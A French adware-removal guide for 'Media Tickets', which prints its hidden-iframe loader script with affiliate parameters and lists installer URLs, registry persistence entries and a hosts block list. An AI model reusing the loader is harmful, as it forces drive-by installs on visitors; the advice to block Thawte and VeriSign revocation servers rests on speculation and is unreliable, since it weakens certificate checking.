 |
|
Media Tickets
|
|
|
|
suppression, effacer, effacement, supprimer, virer, détruire, désinstaller, désinstallation, get rid of, uninstall, remove, removal, tool, delete
|
Alias : |
|
Media Tickets, W32/Rbot-BB
TR/Dldr.Mediket.C.3 [Antivir - pour l'installeur]
DR/PurScan.B [Antivir - pour l'applet Java]
JS:TrojDnldr-1 [Avast]
JS/Adware-PurityScan [McAfee]
Adware/MediaTickets [Panda]
Trojan/PurityScan [The Hacker]
JS.DL.MediaTickets.B [VirusBuster] |
Classes : |
|
Adware, Spyware, Backdoor, Downloader, Hijacker (homepage), trojan
|
Risque : |
|
  |
Editeur : |
|
MediaTickets
Daniel Houston
545 Concord Avenue
Cambridge MA 02138
US
Phone: 617-661-9966
Email: dan@mediatickets.net |
Découverte : |
|
Repéré le 06.05.04. On peut voir dans le code source de l'applet Java, des signatures de modifications datant des 4/7/2004 et 15/7/2004 |
Installation : |
|
La société Media Tickets propose aux webmasters (propriétaires de sites Internet) et aux internautes d'insérer un script dans les pages de leurs sites ou dans les e-mail pour les piéger. Ces pièges, s'ils sont déclanchés (clic de celui qui reçoit le piège) rémunèrent celui qui a installé le piège (0,15 US$ au clic). Ceci se fait en utilisant un iFrame caché lançant l'installation d'une applet Java de 9,83 Ko (10 069 octets) (le 21.07.04).
Contenu de l'iFrame caché (c'est la partie du piège que le webmaster installe sur les pages de son site) :
<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
<script language="JavaScript">
mtrslib_uid = '1234';
mtrslib_retry = 3;
mtrslib_retry_text = 'You must click Yes to access this content.';
mt_set_onload();
</script>
Commentaires sur les passages d'arguments :
mtrslib_uid = '1234'; (ceci est le paramêtre codant l'identification du site affilié)
mtrslib_retry = 3; (ceci est le paramètre codant le nombre de répétitions de l'affichage de la pop-up)
mtrslib_retry_text = 'You must click Yes to access this content.'; (Ce text peut être personnalisé par le Webmaster dont, par exemple, dans la langue de sa cible de visiteurs)
L'applet Java chargée (le fichier mtrslib2.js) lance des affichages de pop-ups irritantes, à intervalles réguliers très rapprochés (1 minute et 4 fois de suite par exemple, au choix du Webmaster qui installe le piège). La pop-up peut être affichée soit à l'entrée dans un site (on load), soit à la sortie d'un site (on unload), soit chaque fois que l'internaute clic sur un lien. La fenêtre en pop-up est totalement bloquante dans votre activité et vous demande de faire confiance en "Media Tickets" en vous faisant croire que vous devez utilisez quelque chose (comme un plug-in) pour voir le contenu du site visité "MediaTickets to view content on this site?". Si vous cliquez "Non", alors une autre popup apparaît prétendant que vous en avez besoin afin de continuer. Si vous fermez cette popup alors la première revient et le cycle continue. L'internaute, irrité et cherchant à s'en débarraser, fini par cliquer sur le bouton "Oui" d'installation.
L'applet mtrslib2.js renommée en .txt pour ceux qui veulent l'étudier.
Un fichier compressé (.cab) est alors téléchargé, d'une taille de 96,9 Ko (99 251 octets) (21.07.04) à partir de http://www.mt-download.com/MediaTicketsInstaller.cab.
Le contrôle MediaTicketsInstaller.cab renommé en .txt pour ceux qui veulent le décompresser et l'étudier.
Ce .cab est décompressé est exécuté. Il semble faire 2 choses :
il installe à son tour le controle ActiveX MediaTicketsInstaller.ocx avec la CSLID 9EB320CE-BE1D-4304-A081-4B4665414BEF
il installe des fichiers .crl, ce qui est curieux car ces fichiers sont, normalement, des fichiers contenant des listes de certificats révoqués et ils semblent provenir de sites plutôt de confiance (bien que souvent mis en doute), engagés dans la délivrance de certificats numériques. Pourquoi ces opérateurs, qui ont pignon sur rue, feraient appel à un marchand d'installations piégées pour détruire des certificats sur nos machines, en cachette ? Les fichiers .crl suivants sont installés.
http://crl.thawte.com/ThawteCodeSigningCA.crl
http://crl.thawte.com/ThawtePremiumServerCA.crl
http://crl.verisign.com/ThawteTimestampingCA.crl
http://crl.verisign.com/tss-ca.crl
Une adresse e-mail chez thawte.com à premium-server@thawte.com
Le site Verisign http://ocsp.verisign.com
On trouve également un lien vers la page de conditions d'utilisation (sic) de Media Tickets à http://www.mt-download.com/terms.html
Un site de Media Tickets à http://mediatickets.net
Remarque : on note, chaque fois, la présence d'un virus de la famille W32/Rbot (dénomination Sophos) qui semble avoir précédé le hijack de la page de démarrage d'Internet Explorer vers des sites, au hasard, contenant le piège Media Tickets.
HiJack vers http://www.unixshellz.info/antitrust (page qui actuellement sort en erreur 404 avec un web-bug dans la page d'erreur 404, web-bug devant servir à comptabiliser les installations du backdoor car il est tagué d'un identificateur : <img SRC="http://geo.yahoo.com/serv?s=19190039&t=1090528606" ALT=1 WIDTH=1 HEIGHT=1>
HiJack vers http://www.angelfire.com/co4/nubnub/error.html
|
Affectés : |
|
S'installe en tant que BHO (donc n'affecte que Internet Explorer et tous les navigateurs basés sur un noyau Internet Explorer) sous les systèmes Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP |
Epargnés : |
|
Les systèmes d'exploitation DOS, Linux, Macintosh, OS/2, UNIX
Les navigateurs basés sur le noyau Gecko (Mozilla, Netscape), Opera |
Activité : |
|
Le seul moyen de se débarrasser de l'envahissante pop-up, hormis avoir un proxy local filtrant le flux entrant ou un firewall bloquant les objets de type applet Java, est d'accepter, en cliquant sur "Oui". |
Vie privée : |
|
Lui-même non, mais installe un backdoor et downloader qui va (système pyramidal) installer ce qu'il veut sans que nous en ayons connaissance et sans pouvoir nous y opposer. |
Faille : |
|
La permission d'utiliser les iFrames est à la base de l'infection. En aval, cette malveillance crée des failles dramatiques de sécurité dont l'installation d'un backdoor et d'un downloader. |
Instabilité : |
|
Pas de connue. |
Conséquences : |
|
L'éradication est sans aucune conséquence sur le bon fonctionnement de tout le reste. |
Précautions : |
|
Réglage de l'antivirus au maximum
Sauvegarde de la base de registre
Désactiver les points de restauration
Redémarrer en mode sans échec
|
Eradication automatique
Scan avec votre antivirus
Si vous avez un antivirus, utilisez-le, sinon télécharger BitDefender Pro ou Kaspersky AVP maintenant. Le scan doit se faire après avoir désactivé les points de restauration puis avoir redémarré en mode sans échec, avec un paramétrage de votre antivirus tel que tous les types de fichiers sont scannés (y compris les fichiers compressés (archives .zip, .rar, .cab etc. ...)). Scanner et détruire tous les fichiers trouvés. Les antivirus ne sont pas des anti-trojans et n'arrivent pas à éradiquer complètement les parasites non viraux dont ils s'occupent. Une intervention manuelle est souvent nécessaire. S'assurer d'avoir un antivirus paramétré à son maximum puis lancer le scan.
On note, chaque fois, la présence d'un vers (worm) de la famille W32/Bot qui semble précéder le hijack d'Internet Explorer vers des sites piégés avec Media Tickets.
Analyse avec votre anti-trojan
Si vous avez un anti-trojan, utilisez-le, sinon téléchargez PestPatrol ou a² personnal ou The Cleaner Pro ou Tauscan maintenant. Le scan doit se faire après avoir désactivé les points de restauration puis avoir redémarré en mode sans échec, et avec les réglages poussés au maximum (voir mode d'emploi de PestPatrol en français). Scanner et détruire tous les objets malicieux trouvés. En version d'essai, illimitée dans le temps et autorisant les mises à jour, PestPatrol effectue seulement la détection complète mais pas l'éradication. A charge pour vous de faire l'éradication à la main.
Eradication en utilisant l'outil proposé par l'auteur du parasite
Vous pouvez utiliser cet outil mais, dans la mesure ou son auteur est également l'auteur du parasite, toutes les réserves sont faites quant-à l'inocuité de cet utilitaire.
http://www.mt-download.com/mt-uninstaller.exe
Action préventive contre le script qui initie ce parasite
Ce parasite est conduit par un script. L'usage d'un proxy local bien paramétré aurait intercepté ce parasite dès l'entrée du flux piégé et l'aurait nettoyé à la volée, avant que celui-ci ne soit mis à la disposition de votre navigateur, vous autorisant une navigation fluide et sûre même sur des sites piégés. Téléchargez maintenant, par exemple, SpyBlocker ou The Proxomitron.
Action préventive contre l'installation sauvage de contrôles ActiveX
Précaution : ce parasite a installé un contrôle ActiveX. Si vous aviez paramétré Internet Explorer pour être informé de cette tentative, vous auriez pu vous y opposer. Lisez ces 2 pages et appliquez les conseils - ActiveX - Anti-ActiveX.
Prévention : les contrôles ActiveX hostiles sont identifiés par leur clé unique d'enregistrement dans la base de registre. Grâce à une technique appelée "Kill Bit", il est possible de prévenir l'installation de ces contrôles ActiveX. Téléchargez et installez immédiatement SpyWare Blaster ou SpyWare Stopper.
Prévention : cette méthode est radicale et définitive contre les parasites de type ActiveX et contre ceux dont l'installation est conduite par un contrôle ActiveX - installez et utilisez Mozilla pour naviguer et laissez tomber définitivement Internet Explorer et ses technologies non standard, cause de la majorité des maux sur Internet.
Eradication manuelle
Précautions initiales génériques
Tuer les processus suivants, s'il sont lancés
Comment tuer un processus
video_32sD.exe
Désenregistrer les DLLs suivantes
Comment désenregistrer une DLL
Redémarrer en mode sans echec
Comment démarrer / redémarrer en mode "sans échec"
Supprimer les clés et/ou entrées suivantes lorsqu'elles existent.
Comment détruire une clé de registre - Comment détruire une entrée d'une clé de registre
Rechercher et détruire, dans toute la base de registre, la clé
9EB320CE-BE1D-4304-A081-4B4665414BEF
Dans les 3 hiérarchies suivantes, détruires les entrées concernant le fichier video_32sD.exe HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NVIDIA Video drivers = video_32sD.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NVIDIA Video drivers = video_32sD.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices NVIDIA Video drivers = video_32sD.exe
Dans la hiérarchie HKEY_USERS, chaque utilisateur dispose d'une zone de registre nommée HKEY_USERS\[code utilisateur]\. Pour chaque utilisateur, recherchez l'entrée : HKU\[code utilisateur]\Software\Microsoft\Windows\ CurrentVersion\Run\ et détruires les entrées concernant le fichier video_32sD.exe.
Fermez l'éditeur du registre.
Détruire les répertoires suivants, s'ils existent (et tout ce qu'ils contiennent).
Comment détruire un répertoire
Détruire les fichiers suivants, s'ils existent
Comment détruire un fichier
video_32sD.exe
MediaTicketsInstaller.cab
Suggestion de serveurs à bloquer par leurs noms de domaine dans hosts
Qu'est-ce que hosts
La malveillance tente de se connecter à divers sites.
127.0.0.1 mt-download.com
127.0.0.1 www.mt-download.com
127.0.0.1 crl.thawte.com
127.0.0.1 www.crl.thawte.com
127.0.0.1 ocsp.verisign.com
127.0.0.1 www.ocsp.verisign.com
127.0.0.1 crl.verisign.com
127.0.0.1 www.crl.verisign.com
127.0.0.1 mediatickets.net
127.0.0.1 www.mediatickets.net
Sites qui installent la malveillance (sites affiliés et piégés)
127.0.0.1 t35.com
127.0.0.1 www.t35.com
127.0.0.1 silvermagnet.com
127.0.0.1 www.silvermagnet.com
127.0.0.1 angelfire.com
127.0.0.1 www.angelfire.com
Rechercher les parasites connexes
En amont, ce parasite a pu être installé par le ou les parasites ci-dessous qui ont agit en Downloader (téléchargeurs)
En aval, ce parasite a pu agir en Downloader (téléchargeur) et installer le ou les parasites ci-dessous.
Ressources
Des informations complémentaires peuvent être trouvées sur ces pages
A propos de video_32sD.exe
http://www.sophos.com/virusinfo/analyses/w32rbotbb.html
http://it.trendmicro-europe.com/enterprise/security_info/ve_detail.php?
http://lists.debian.org/debian-security/2004/06/msg00000.html
A propos des fichiers de type .crl
http://www.filext.com/detaillist.php?extdetail=CRL
http://www.crufty.net/ftp/pub/sjg/help/crl.html
Autres notes
http://www.computercops.biz/postx56786-0-0.html&sid=e8b276b1b84ddeea0d9895672cc1f824
Cordialement
Pierre Pinard
Je vous ai aidé ? Merci de m'aider à poursuivre.
Soutien et donnations
Rédigé en écoutant :
|
 |
|